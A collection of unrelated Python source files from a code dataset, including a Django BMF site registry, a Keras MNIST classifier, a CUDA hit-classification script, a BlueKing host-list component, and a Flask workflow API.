@property
def key(self):
return SETTING_KEY % (self.app_label, self.name)
@property
def required(self):
return self.field.required
@property
def changed(self):
return self.field.initial != self.value
@property
def label(self):
if self.field.label:
return self.field.label
return self.key
@property
def default(self):
return self.field.initial
@property
def value(self):
try:
value = Configuration.objects.get_value(self.app_label, self.name)
except Configuration.DoesNotExist:
value = self.field.initial
return value
class DjangoBMFModule(object):
index = None
create = None
delete = None
update = None
detail = None
report = None
clone = None
urlpatterns = None
def __init__(self, model):
self.model = model
def get_urls(self, **options):
index = self.index or options.get('index', None)
create = self.create or options.get('create', None)
delete = self.delete or options.get('delete', None)
update = self.update or options.get('update', None)
detail = self.detail or options.get('detail', None)
report = self.report or options.get('report', None)
clone = self.clone or options.get('clone', None)
add_patterns = self.urlpatterns or options.get('urlpatterns', None)
urlpatterns = patterns(
'',
url( # TODO: OLD
r'^$',
index.as_view(model=self.model),
name='index',
),
url(
r'^(?P<pk>[0-9]+)/$',
detail.as_view(model=self.model),
name='detail',
),
url(
r'^(?P<pk>[0-9]+)/update/$',
update.as_view(model=self.model),
name='update',
),
url(
r'^(?P<pk>[0-9]+)/delete/$',
delete.as_view(model=self.model),
name='delete',
),
url(
r'^(?P<pk>[0-9]+)/update/form-api/$',
ModuleFormAPI.as_view(
model=self.model,
form_view=update,
),
name='form-api',
),
)
# create view(s)
if isinstance(create, dict):
for label, view in six.iteritems(create):
key = slugify(label)
if isinstance(view, (list, tuple)):
label = view[0]
view = view[1]
self.model._bmfmeta.create_views.append((key, label))
urlpatterns += patterns(
'',
url(
r'^create/(?P<key>%s)/$' % key,
view.as_view(model=self.model),
name='create',
),
url(
r'^create/(?P<key>%s)/form-api/$' % key,
ModuleFormAPI.as_view(
model=self.model,
form_view=view,
),
name='form-api',
),
)
else:
urlpatterns += patterns(
'',
url(
r'^create/$',
create.as_view(model=self.model),
name='create',
),
url(
r'^create/form-api/$',
ModuleFormAPI.as_view(
model=self.model,
form_view=create,
),
name='form-api',
),
)
# workflow interactions
if bool(len(self.model._bmfworkflow._transitions)):
urlpatterns += patterns(
'',
url(
r'^(?P<pk>[0-9]+)/workflow/(?P<transition>\w+)/$',
ModuleWorkflowView.as_view(model=self.model),
name='workflow',
),
)
# model reports
if report:
self.model._bmfmeta.has_report = True
urlpatterns += patterns(
'',
url(
r'^(?P<pk>[0-9]+)/report/$',
report.as_view(model=self.model),
name='report',
),
)
# clone model
if self.model._bmfmeta.can_clone:
urlpatterns += patterns(
'',
url(
r'^(?P<pk>[0-9]+)/clone/$',
clone.as_view(model=self.model),
name='clone',
),
url(
r'^(?P<pk>[0-9]+)/clone/form-api/$',
ModuleFormAPI.as_view(
model=self.model,
form_view=clone,
),
name='clone-form-api',
),
)
# url patterns
if add_patterns:
urlpatterns += add_patterns
return urlpatterns
class DjangoBMFSite(object):
"""
Handle this object like the AdminSite from django.contrib.admin.sites
"""
def __init__(self, name='djangobmf', app_name=APP_LABEL):
self.name = name
self.app_name = app_name
self.clear()
def clear(self):
# combine all registered modules here
self._registry = {}
# all currencies should be stored here
self.currencies = {}
# all reports should be stored here
self.reports = {}
# if a module requires a custom setting, it can be stored here
self.settings = {}
self.settings_valid = False
self.register_settings(APP_LABEL, {
'company_name': forms.CharField(max_length=100, required=True,),
'company_email': forms.EmailField(required=True,),
'currency': forms.CharField(max_length=10, required=True,), # TODO add validation / use dropdown
})
# --- models --------------------------------------------------------------
def register(self, model, admin=None, **options):
self.register_model(model, admin)
for view in ['index', 'create', 'detail', 'update', 'delete', 'report', 'clone']:
if view in options:
self.register_old_view(model, view, options[view])
if 'urlpatterns' in options:
self._registry[model]['urlpatterns'] = options['urlpatterns']
def register_model(self, model, admin=None):
if not hasattr(model, '_bmfmeta'):
raise ImproperlyConfigured(
'The model %s needs to be an BMF-Model in order to be'
'registered with django BMF.' % model.__name__
)
if model in self._registry:
raise AlreadyRegistered('The model %s is already registered' % model.__name__)
self._registry[model] = {
'admin': (admin or DjangoBMFModule)(model),
'index': ModuleIndexView,
'create': ModuleCreateView,
'detail': ModuleAutoDetailView,
'update': ModuleUpdateView,
'delete': ModuleDeleteView,
'clone': ModuleCloneView,
'report': None,
'urlpatterns': None,
}
def unregister(self, model):
self.unregister_model(model)
def unregister_model(self, model):
if model not in self._registry:
raise NotRegistered('The model %s is not registered' % model.__name__)
del self._registry[model]
# --- views ---------------------------------------------------------------
def register_old_view(self, model, type, view):
if type in ['index', 'detail', 'update', 'delete', 'clone']:
# TODO check if view is an bmf-view
# add the view
self._registry[model][type] = view
elif type == 'report':
if isinstance(view, bool):
if view:
self._registry[model][type] = ModuleReportView
else:
# TODO check if view is an bmf-view
# add the view
self._registry[model][type] = view
elif type == 'create':
# if isinstance(create, dict):
# TODO check if view is an bmf-view
# add the view
self._registry[model][type] = view
def register_genericview(self, dashboard, category, model, view):
pass
# --- currencies ----------------------------------------------------------
def register_currency(self, currency):
if currency.iso in self.currencies:
raise AlreadyRegistered('The currency %s is already registered' % currency.__name__)
self.currencies[currency.iso] = currency
def unregister_currency(self, currency):
if currency.iso not in self.currencies:
raise NotRegistered('The currency %s is not registered' % currency.__name__)
del self.currencies[currency.iso]
# --- reports -------------------------------------------------------------
def register_report(self, name, cls):
if name in self.reports:
raise AlreadyRegistered('The report %s is already registered' % name)
self.reports[name] = cls
def unregister_report(self, name):
if name not in self.reports:
raise NotRegistered('The currency %s is not registered' % name)
del self.reports[name]
# --- settings ------------------------------------------------------------
def register_settings(self, app_label, settings_dict):
for setting_name, options in settings_dict.items():
self.register_setting(app_label, setting_name, options)
def register_setting(self, app_label, setting_name, options):
name = SETTING_KEY % (app_label, setting_name)
if name in self.settings:
raise AlreadyRegistered('The setting %s is already registered' % name)
self.settings[name] = DjangoBMFSetting(app_label, setting_name, options)
def unregister_setting(self, app_label, setting_name):
name = SETTING_KEY % (app_label, setting_name)
if name not in self.settings:
raise NotRegistered('The setting %s is not registered' % name)
del self.settings[name]
def check_settings(self):
self.settings_valid = False
for key, setting in self.settings:
if not setting.value and setting.field.required:
self.settings_valid = False
return False
return True
def get_lazy_setting(self, app_label, setting_name):
"""
will allways return None, if the django apps are not ready
"""
if apps.ready:
return self.get_setting(app_label, setting_name)
return None
def get_setting(self, app_label, setting_name):
name = SETTING_KEY % (app_label, setting_name)
try:
return self.settings[name].value
except KeyError:
raise NotRegistered('The setting %s is not registered' % name)
# --- workspace -----------------------------------------------------------
def register_dashboard(self, dashboard):
obj = dashboard()
label = '%s.%s' % (obj.__module__, obj.__class__.__name__)
workspace = apps.get_model(APP_LABEL, "Workspace")
try:
ws, created = workspace.objects.get_or_create(module=label, level=0)
except OperationalError:
logger.debug('Database not ready, skipping registration of Dashboard %s' % label)
return False
if created or ws.slug != obj.slug or ws.url != obj.slug:
ws.slug = obj.slug
ws.url = obj.slug
ws.editable = False
ws.save()
logger.debug('Dashboard %s registered' % label)
return True
def register_category(self, dashboard, category):
parent = dashboard()
obj = category()
label = '%s.%s' % (obj.__module__, obj.__class__.__name__)
parent_label = '%s.%s' % (parent.__module__, parent.__class__.__name__)
workspace = apps.get_model(APP_LABEL, "Workspace")
try:
parent_workspace = workspace.objects.get(module=parent_label)
except OperationalError:
logger.debug('Database not ready, skipping registration of Category %s' % label)
return False
except workspace.DoesNotExist:
logger.error('%s does not exist - skipping registration of Category %s' % (parent_label, label))
return False
ws, created = workspace.objects \
.select_related('parent') \
.get_or_create(module=label, parent=parent_workspace)
if created or ws.slug != obj.slug or ws.url != ws.get_url():
ws.slug = obj.slug
ws.editable = False
ws.update_url()
ws.save()
logger.debug('Category %s registered' % label)
return True
def register_view(self, model, category, view):
parent = category()
obj = view()
label = '%s.%s' % (obj.__module__, obj.__class__.__name__)
parent_label = '%s.%s' % (parent.__module__, parent.__class__.__name__)
workspace = apps.get_model(APP_LABEL, "Workspace")
try:
parent_workspace = workspace.objects.get(module=parent_label)
except OperationalError:
logger.debug('Database not ready, skipping registration of View %s' % label)
return False
except workspace.DoesNotExist:
logger.error('%s does not exist - skipping registration of View %s' % (parent_label, label))
return False
ct = ContentType.objects.get_for_model(model)
ws, created = workspace.objects \
.select_related('parent') \
.get_or_create(module=label, parent=parent_workspace)
if created or ws.slug != obj.slug or ws.url != ws.get_url() or ws.ct != ct:
ws.ct = ct
ws.slug = obj.slug
ws.editable = False
ws.update_url()
ws.save()
logger.debug('View %s registered' % label)
return True
# --- misc methods --------------------------------------------------------
@property
def is_ready(self):
return apps.get_app_config(APP_LABEL).is_ready
@property
def urls(self):
return self.get_urls(), self.app_name, self.name
@property
def models(self):
models = {}
for model in self._registry:
ct = ContentType.objects.get_for_model(model)
models[ct.pk] = model
return models
def check_dependencies(self):
"""
Check that all things needed to run the admin have been correctly installed.
The default implementation checks that admin and contenttypes apps are
installed, as well as the auth context processor.
"""
# TODO: Check out django's system checks framework and redo checks
# https://docs.djangoproject.com/en/1.7/topics/checks/
if not apps.is_installed('django.contrib.admin'):
raise ImproperlyConfigured(
"Put 'django.contrib.admin' in "
"your INSTALLED_APPS setting in order to use the bmf."
)
if not apps.is_installed('django.contrib.contenttypes'):
raise ImproperlyConfigured(
"Put 'django.contrib.contenttypes' in "
"your INSTALLED_APPS setting in order to use the bmf."
)
if 'django.contrib.auth.context_processors.auth' not in settings.TEMPLATE_CONTEXT_PROCESSORS:
raise ImproperlyConfigured(
"Put 'django.contrib.auth.context_processors.auth' "
"in your TEMPLATE_CONTEXT_PROCESSORS setting in order to use the bmf."
)
def get_urls(self):
from djangobmf.urls import urlpatterns
if not apps.ready and "migrate" in sys.argv:
return urlpatterns
if settings.DEBUG:
self.check_dependencies()
for model in self._registry:
data = self._registry[model]
urls = data['admin'].get_urls(**{
"index": data['index'],
"create": data['create'],
"detail": data['detail'],
"update": data['update'],
"delete": data['delete'],
"report": data['report'],
"clone": data['clone'],
"urlpatterns": data['urlpatterns'],
})
info = (model._meta.app_label, model._meta.model_name)
urlpatterns += patterns(
'',
url(
r'^module/%s/%s/' % (info[1], info[0]),
include((urls, self.app_name, "module_%s_%s" % info))
)
)
return urlpatterns
site = DjangoBMFSite()
def autodiscover():
for app_config in apps.get_app_configs():
try:
# get a copy of old site configuration
before_import_r = copy.copy(site._registry)
before_import_c = copy.copy(site.currencies)
before_import_s = copy.copy(site.settings)
before_import_p = copy.copy(site.reports)
import_module('%s.%s' % (app_config.name, "bmf_module"))
except:
# Reset the model registry to the state before the last import
# skiping this may result in an AlreadyRegistered Error
site._registry = before_import_r
site.currencies = before_import_c
site.settings = before_import_s
site.reports = before_import_p
# Decide whether to bubble up this error
if module_has_submodule(app_config.module, "bmf_module"):
raise
| StarcoderdataPython |
3307911 | <gh_stars>0
##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: <NAME>
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
##
# This is a base file that is not intended to be overridden.
##
##
# uengine is deprecated and will be removed from the system soon. Migrate your
# apps to using the Data Access Framework (DAF).
##
from java.util import ArrayList
from com.raytheon.uf.common.message.response import ResponseMessageGeneric
from com.raytheon.uf.edex.database.plugin import PluginFactory
from com.raytheon.edex.uengine.tasks.query import TableQuery
from gov.noaa.nws.ncep.edex.uengine.utility import GempakConvert
class GempakEnsembleTemplateGenerator():
def __init__(self, pluginName):
self.pluginName = pluginName
self.eventName = None
self.perturbationNum = 0
#
# create the TableQuery instance
#
try:
className = PluginFactory.getInstance().getPluginRecordClassName(pluginName)
except:
#
# handle the exception if the plugin record class cannot be found
#
message = "RunTimeError getting the PluginRecordClassName for " + \
pluginName + " "
import sys
if sys.exc_info()[1] is not None:
str = "%s" % sys.exc_info()[1]
indx = str.find("\n")
if indx > 0:
message = message + str[:indx]
print "Unexpected error:" + message
return self.__makeNullResponse(message)
databaseName = "metadata"
#
# create the TableQuery instance for specified database
# and plugin record class
#
self.query = TableQuery(databaseName,className)
self.query.setDistinctField("eventName")
def setEnsembleName(self, modelName):
self.modelName = modelName
self.query.addParameter ("modelName", modelName)
def setEnsembleEventName(self, eventName):
self.eventName = eventName
self.query.addParameter ("eventName", eventName)
def setEnsemblePerturbationNumber(self, perturbationNum):
self.perturbationNum = perturbationNum
self.query.addParameter ("modelInfo.perturbationNumber", perturbationNum)
def execute(self):
#
# execute the set query
#
try:
queryResult = ArrayList()
queryResult = self.query.execute()
# print "queryResult = ", queryResult
except:
message = "RunTimeError executing TableQuery "
import sys
if sys.exc_info()[1] is not None:
str = "%s" % sys.exc_info()[1]
indx = str.find("\n")
if indx > 0:
message = message + str[:indx]
print "Unexpected error:" + message
return self.__makeNullResponse(message)
#
# process the results of the query
#
if queryResult is None:
return self.__makeNullResponse("Query returned no results")
else:
return self.__makeResponse(queryResult)
def __makeResponse(self, ensArrayList):
size = ensArrayList.size()
ensList = []
for i in range(size):
ensList.append("%s" % ensArrayList.get(i))
commonStart = self.__findCommonStart(ensList)
# print "commonStart= ", commonStart
# if self.perturbationNum == 0:
# ensTemplate = self.modelName + "_db_" + commonStart + "*_YYYYMMDDHHfFFF"
# else:
ensTemplate = self.modelName + "_db_" + commonStart + "_YYYYMMDDHHfFFF"
response = ArrayList()
response.add(ResponseMessageGeneric(ensTemplate))
return response
def __makeNullResponse(self, aMessage=None):
return ResponseMessageGeneric(aMessage)
def __findCommonStart (self, strlist):
strlist = strlist[:]
prev = None
while True:
common = self.__getCommonLetters(strlist)
if common == prev:
break
strlist.append(common)
prev = common
return self.__getCommonLetters(strlist)
def __getCommonLetters(self, strlist):
return ''.join([x[0] for x in zip(*strlist) \
if reduce(lambda a,b:(a == b) and a or None,x)]) | StarcoderdataPython |
1779427 | #!/usr/bin/env python
import sys
import os
sys.path.append(os.getcwd())
import cpmsparse.util as util
from cpmsparse.kernels import PatternSparse, CpmSparse
import pandas as pd
import numpy as np
group_id = 'g8788' # event hits: 130
print("We're good to go!")
context, cc = util.init_pycuda()
# Load data
N, x, y, z, ct = util.get_real_input_data(f"sample_data/sample_{group_id}.csv")
print("Read", N, "hits from file")
# Load Pattern Matrix
pattern_file = 'pattern_mtx_50_50_100_100.csv'
pattern = np.loadtxt(open(pattern_file, "rb"), delimiter=",")
pattern = np.array(pattern.flatten()).astype(np.float32)
# Correlation criterion
pattern_threshold = 0.01 # the pattern correlation threshold [percent]
pattern_time_bin_count = 50 # number of bins for time domain
pattern_dist_bin_count = 50 # number of bins for distance domain
pattern_time_limit = 100 # pattern time limit - the time multiplied by the speed of light [meters]
pattern_dist_limit = 100 # pattern distance limit [meters]
pattern_kernel = PatternSparse(N, cc=cc,
ptt_threshold=pattern_threshold,
ptt_time_bin_count=pattern_time_bin_count,
ptt_dist_bin_count=pattern_dist_bin_count,
ptt_time_limit=pattern_time_limit,
ptt_dist_limit=pattern_dist_limit)
d_col_idx, d_prefix_sums, d_degrees, total_hits = pattern_kernel.compute(N, x, y, z, ct, pattern)
# Community detection and classification
cpm_resolution = 0.1 # CPM resolution parameter
cpm_kernel = CpmSparse(N, cc=cc)
classified_hits = cpm_kernel.compute(d_col_idx, d_prefix_sums, cpm_resolution)
print("Number of classified hits: ", classified_hits)
| StarcoderdataPython |
23828 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
""" # noqa
import json
from django import forms
from common.forms import BaseComponentForm, TypeCheckField
from components.component import Component
from .toolkit import configs
class GetHostList(Component):
"""
apiLabel get host list
apiMethod GET
### Functional Description
Get host list
### Request Parameters
{{ common_args_desc }}
#### Interface Parameters
| Field | Type | Required | Description |
|-----------|------------|--------|------------|
| app_id | int | Yes | Business ID |
| ip_list | array | No | Host IP address, including ip and bk_cloud_id, bk_cloud_id represents cloud area ID |
### Request Parameters Example
```python
{
"bk_app_code": "esb_test",
"bk_app_secret": "xxx",
"bk_token": "<PASSWORD>",
"bk_biz_id": 1,
"ip_list": [
{
"ip": "10.0.0.1",
"bk_cloud_id": 0
},
{
"ip": "10.0.0.2"
"bk_cloud_id": 0
}
]
}
```
### Return Result Example
```python
{
"result": true,
"code": 0,
"message": "",
"data": [
{
"inner_ip": "10.0.0.1",
"bk_cloud_id": 0,
"host_name": "db-1",
"maintainer": "admin"
},
{
"inner_ip": "10.0.0.2",
"bk_cloud_id": 2,
"host_name": "db-2",
"maintainer": "admin"
}
]
}
```
"""
# Name of the system to which the component belongs
sys_name = configs.SYSTEM_NAME
# Form Processing Parameters Validation
class Form(BaseComponentForm):
bk_biz_id = forms.CharField(label='Business ID', required=True)
ip_list = TypeCheckField(label='Host IP address', promise_type=list, required=False)
# The data returned in clean method is available through the component's form_data property
def clean(self):
return self.get_cleaned_data_when_exist(keys=['<KEY>', 'ip_list'])
# Component Processing Access
def handle(self):
# Get the data processed in Form clean
data = self.form_data
# Set Current Operator
data['operator'] = self.current_user.username
# Request System Interface
try:
response = self.outgoing.http_client.post(
host=configs.host,
path='/hcp/get_host_list/',
data=json.dumps(data),
)
except Exception:
# TODO: To delete, only fake data for testing
response = {
'code': 0,
'data': [
{
'inner_ip': '10.0.0.1',
'bk_cloud_id': 0,
'host_name': 'just_for_test',
'maintainer': 'admin',
},
]
}
# Analyze the Results
code = response['code']
if code == 0:
result = {
'result': True,
'data': response['data'],
}
else:
result = {
'result': False,
'message': response['message']
}
# Set the component return result, and payload is the actual return result of component
self.response.payload = result
| StarcoderdataPython |
71483 | <filename>pythx/middleware/group_data.py<gh_stars>10-100
"""This module contains a middleware to fill the :code:`groupId`/:code:`groupName`
field."""
import logging
from typing import Dict
from pythx.types import RESPONSE_MODELS, REQUEST_MODELS
from pythx.middleware.base import BaseMiddleware
LOGGER = logging.getLogger("GroupDataMiddleware")
class GroupDataMiddleware(BaseMiddleware):
"""This middleware fills the :code:`groupId` and :code:`groupName` fields
when submitting a new analysis job.
This means that only :code:`process_request` carries business logic, while
:code:`process_response` returns the input response object right away without touching it.
"""
def __init__(self, group_id: str = None, group_name: str = None):
LOGGER.debug("Initializing")
self.group_id = group_id
self.group_name = group_name
def process_request(self, req: REQUEST_MODELS) -> Dict:
"""Add the :code:`groupId` and/or :code:`groupName` field if the
request we are making is the submission of a new analysis job.
Because we execute the middleware on the request data dictionary, we cannot simply
match the domain model type here. However, based on the endpoint and the request
method we can determine that a new job has been submitted. In any other case, we
return the request right away without touching it.
:param req: The request's data dictionary
:return: The request's data dictionary, optionally with the group data field(s) filled in
"""
if not (req["method"] == "POST" and req["url"].endswith("/analyses")):
return req
if self.group_id:
LOGGER.debug("Adding group ID %s to request", self.group_id)
req["payload"]["groupId"] = self.group_id
if self.group_name:
LOGGER.debug("Adding group name %s to request", self.group_name)
req["payload"]["groupName"] = self.group_name
return req
def process_response(self, resp: RESPONSE_MODELS) -> RESPONSE_MODELS:
"""This method is irrelevant for adding our group data, so we don't do
anything here.
We still have to define it, though. Otherwise when calling the abstract base class'
:code:`process_response` method, we will encounter an exception.
:param resp: The response domain model
:return: The very same response domain model
"""
LOGGER.debug("Forwarding the response without any action")
return resp
| StarcoderdataPython |
1684593 | <reponame>maykinmedia/maykin-email-templates
from django.http import HttpResponse
from django.views.generic import View
from .utils import variable_help_text
class TemplateVariableView(View):
def get(self, request, *args, **kwargs):
variables = variable_help_text(kwargs.get('template_type'))
return HttpResponse(variables)
| StarcoderdataPython |
3343919 | <reponame>LeWeis/captcha-break
# coding=utf-8
from __future__ import print_function
from gen.gen_captcha import gen_dataset, load_templates
import cPickle as pickle
from PIL import Image
import numpy as np
from gen.utils import vec2str
def check_dataset(dataset, labels, index):
data = np.uint8(dataset[index]).reshape((40, 100)) * 255
im = Image.fromarray(data)
im.show()
print("label:", vec2str(labels[index]))
if __name__ == '__main__':
templates = load_templates()
dataset, labels = gen_dataset(1, templates) # generate one image
check_dataset(dataset, labels, 0)
| StarcoderdataPython |
3269348 | <filename>tests/scidash/tests/observations.py
"""Observations (experimental facts) used to parameterize tests"""
import os, sys
import quantities as pq
import django
path = os.path.realpath(__file__)
for i in range(4):
path = os.path.split(path)[0]
CW_HOME = path
sys.path.append(CW_HOME)
sys.path.append(os.path.join(CW_HOME,'channelworm')) # Path to 'web_app'
os.environ.setdefault(
"DJANGO_SETTINGS_MODULE",
"web_app.settings"
)
django.setup()
from django.conf import settings
settings.DEBUG = False
# Must be imported after Django setup
from channelworm.ion_channel.models import GraphData
def iv(doi,fig):
sample_data = GraphData.objects.get(graph__experiment__reference__doi=doi,
graph__figure_ref_address=fig)
obs = list(zip(*sample_data.asarray()))
iv = {'i/C':obs[1]*pq.A/pq.F, 'v':obs[0]*pq.mV}
cell_capacitance = 1e-13 * pq.F # Capacitance is arbitrary if IV curves are scaled.
iv['i'] = iv['i/C']*cell_capacitance
return iv
egl19_iv = iv('10.1083/jcb.200203055','2B')
slo2_iv = iv('10.1113/jphysiol.2010.200683','7B') | StarcoderdataPython |
3372131 | from keras import layers
from keras import models
from keras.datasets import mnist
from keras.utils import to_categorical
import tensorflow as tf
import os
import contextlib
import datetime
# @contextlib.contextmanager
# def options(options):
# old_opts = tf.config.optimizer.get_experimental_options()
# tf.config.optimizer.set_experimental_options(options)
# try:
# yield
# finally:
# tf.config.optimizer.set_experimental_options(old_opts)
if __name__ == '__main__':
# os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
os.environ["XLA_FLAGS"] = '--xla_gpu_cuda_data_dir="D:/Program Files/CUDA/v11.2/development"'
os.environ["TF_GPU_THREAD_MODE"] = 'gpu_private'
physical_devices = tf.config.list_physical_devices('GPU')
tf.config.experimental.set_memory_growth(physical_devices[0], True) # important!
# tf.config.experimental.enable_mlir_bridge()
# tf.config.experimental.enable_mlir_graph_optimization()
tf.config.optimizer.set_jit(True)
model = models.Sequential()
model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1)))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.Flatten())
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(10, activation='softmax'))
model.summary()
(train_images, train_labels), (test_images, test_labels) = mnist.load_data()
train_images = train_images.reshape((60000, 28, 28, 1))
train_images = train_images.astype('float32') / 255
test_images = test_images.reshape((10000, 28, 28, 1))
test_images = test_images.astype('float32') / 255
train_labels = to_categorical(train_labels)
test_labels = to_categorical(test_labels)
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
# with options({'constant_folding': True, 'debug_stripper': True}):
# print(tf.config.optimizer.get_experimental_options())
logdir = os.path.join("logs", datetime.datetime.now().strftime("%Y%m%d-%H%M%S"))
tensorboard_callback = tf.keras.callbacks.TensorBoard(logdir, histogram_freq=1, profile_batch = '500,520')
model.fit(train_images, train_labels, epochs=5, batch_size=64, callbacks=[tensorboard_callback])
test_loss, test_acc = model.evaluate(test_images, test_labels)
print(f'Test Accuracy: {test_acc}')
print(f'Test Loss: {test_loss}')
print('Demo finished')
| StarcoderdataPython |
1669599 | from django.db import models
from django.contrib.auth.models import AbstractUser, UserManager
# Create your models here.
| StarcoderdataPython |
163706 | <reponame>eubr-bigsea/tahiti
# -*- coding: utf-8 -*-}
import logging
import os
import uuid
import requests
from flask import request, current_app, g
from flask_babel import gettext
from flask_restful import Resource
from sqlalchemy import or_
from sqlalchemy.orm import joinedload
from sqlalchemy.sql.elements import and_
from marshmallow.exceptions import ValidationError
from tahiti.app_auth import requires_auth
from tahiti.schema import *
log = logging.getLogger(__name__)
def optimize_workflow_query(workflows):
return workflows \
.options(joinedload('tasks')) \
.options(joinedload('tasks.operation')) \
.options(joinedload('tasks.operation.current_translation')) \
.options(joinedload('platform')) \
.options(joinedload('platform.current_translation')) \
.options(joinedload('flows'))
def update_port_name_in_flows(session, workflow_id):
sql = """
UPDATE flow, operation_port s, operation_port t,
operation_port_translation t1, operation_port_translation t2
SET source_port_name = t1.name, target_port_name = t2.name
WHERE flow.source_port = s.id AND flow.target_port = t.id
AND s.id = t1.id AND t.id = t2.id
AND workflow_id = :id"""
session.execute(sql, {'id': workflow_id})
def get_workflow(workflow_id):
workflows = optimize_workflow_query(
Workflow.query.filter_by(id=workflow_id).order_by(
Workflow.name))
workflows = filter_by_permissions(
workflows, list(PermissionType.values()))
workflows = workflows.options(
joinedload('tasks.operation.forms')).options(
joinedload('tasks.operation.forms')).options(
joinedload('tasks.operation.forms.fields'))
workflow = workflows.first()
if workflow is not None:
# Set the json form for operations
for task in workflow.tasks:
current_form = json.loads(task.forms) if task.forms else {}
if task.operation:
for form in task.operation.forms:
for field in form.fields:
if field.name not in current_form:
current_form[field.name] = {
'value': field.default}
db.session.expunge(task) # in order to avoid unnecessary updates
task.forms = json.dumps(current_form)
return workflow
def filter_by_permissions(workflows, permissions, consider_public=True):
if g.user.id not in (0, 1): # It is not a inter service call
sub_query = WorkflowPermission.query.with_entities(
WorkflowPermission.workflow_id).filter(
WorkflowPermission.permission.in_(permissions),
WorkflowPermission.user_id == g.user.id)
conditions = [
Workflow.user_id == g.user.id,
Workflow.id.in_(sub_query)
]
if consider_public:
conditions.append(Workflow.is_public)
workflows = workflows.filter(or_(*conditions))
return workflows
def test_and_apply_filter(request, arg, workflow, condition):
result = workflow
value = request.args.get(arg)
if value:
result = workflow.filter(condition(value))
return result
class WorkflowListApi(Resource):
""" REST API for listing class Workflow """
@staticmethod
@requires_auth
def get():
workflows = Workflow.query
try:
if request.args.get('fields'):
only = [x.strip() for x in
request.args.get('fields').split(',')]
else:
only = ('id', 'name', 'platform.id', 'permissions')
workflows = test_and_apply_filter(request, 'platform', workflows,
lambda v: Workflow.platform.has(slug=v))
# platform = request.args.get('platform', None)
# if platform:
# workflows = workflows.filter(
# Workflow.platform.has(slug=platform))
workflows = test_and_apply_filter(request, 'track', workflows,
lambda v: Workflow.publishing_enabled == (v != 'false'))
workflows = test_and_apply_filter(request, 'published', workflows,
lambda v: Workflow.publishing_status == PublishingStatus.PUBLISHED)
# is_track_filter = request.args.get('track')
# if is_track_filter:
# workflows = workflows.filter(
# Workflow.publishing_enabled == (is_track_filter != 'false'))
# is_published = request.args.get('published')
# if is_published:
# workflows = workflows.filter(
# Workflow.publishing_status == PublishingStatus.PUBLISHED)
workflows = test_and_apply_filter(request, 'enabled', workflows,
lambda v: Workflow.enabled == (v != 'false'))
# enabled_filter = request.args.get('enabled')
# if enabled_filter:
# workflows = workflows.filter(
# Workflow.enabled == (enabled_filter != 'false'))
workflows = test_and_apply_filter(request, 'template', workflows,
lambda v: or_(and_(Workflow.user_id == g.user.id,
Workflow.is_template),
Workflow.is_system_template))
# template_only = request.args.get('template')
# if template_only is not None:
# template_only = template_only in ['1', 'true', 'True']
# else:
# template_only = False
# if template_only:
# workflows = workflows.filter(
# or_(and_(Workflow.user_id == g.user.id,
# Workflow.is_template),
# Workflow.is_system_template))
workflows = test_and_apply_filter(request, 'name', workflows,
lambda v: Workflow.name.like('%%{}%%'.format(v)))
# name_filter = request.args.get('name')
# if name_filter:
# workflows = workflows.filter(
# Workflow.name.like(
# '%%{}%%'.format(name_filter)))
workflows = filter_by_permissions(
workflows, list(PermissionType.values()))
sort = request.args.get('sort', 'name')
if sort not in ['name', 'id', 'user_name', 'updated', 'created']:
sort = 'name'
sort_option = getattr(Workflow, sort)
if request.args.get('asc', 'true') == 'false':
sort_option = sort_option.desc()
workflows = optimize_workflow_query(
workflows.order_by(sort_option))
page = int(request.args.get('page', 1))
page_size = int(request.args.get('size', 20))
page = int(page)
pagination = workflows.paginate(page, page_size, False)
if pagination.total < (page - 1) * page_size and page != 1:
# Nothing in that specified page, return to page 1
pagination = workflows.paginate(1, page_size, False)
result = {
'data': WorkflowListResponseSchema(many=True,
only=only).dump(
pagination.items),
'pagination': {'page': page, 'size': page_size,
'total': pagination.total,
'pages': pagination.total / page_size + 1}}
return result
except Exception as e:
log.exception(e)
result = dict(status="ERROR", message="Internal error")
if current_app.debug:
result['debug_detail'] = str(e)
return result, 500
@staticmethod
@requires_auth
def post():
result, result_code = dict(
status="ERROR", message="Missing json in the request body"), 400
if request.args.get('source'):
original = Workflow.query.get(int(request.args.get('source')))
response_schema = WorkflowItemResponseSchema()
cloned = response_schema.dump(original)
# User field is not present in constructor
platform = cloned.pop('platform')
cloned['platform'] = Platform.query.get(platform['id'])
cloned['user_id'] = g.user.id
cloned['user_login'] = g.user.login
cloned['user_name'] = g.user.name
for task in cloned['tasks']:
task['id'] = str(uuid.uuid4())
task['operation_id'] = task['operation']['id']
cloned['platform_id'] = cloned['platform']['id']
request_schema = WorkflowCreateRequestSchema()
workflow = request_schema.load(cloned)
elif request.json:
data = request.json
if 'user' in data:
data.pop('user')
request_schema = WorkflowCreateRequestSchema()
response_schema = WorkflowItemResponseSchema()
for task in data.get('tasks', {}):
task['operation_id'] = task['operation']['id']
task['forms'] = {k: v for k, v in list(task['forms'].items())
if v.get('value') is not None or
v.get('publishing_enabled') == True}
params = {}
params.update(data)
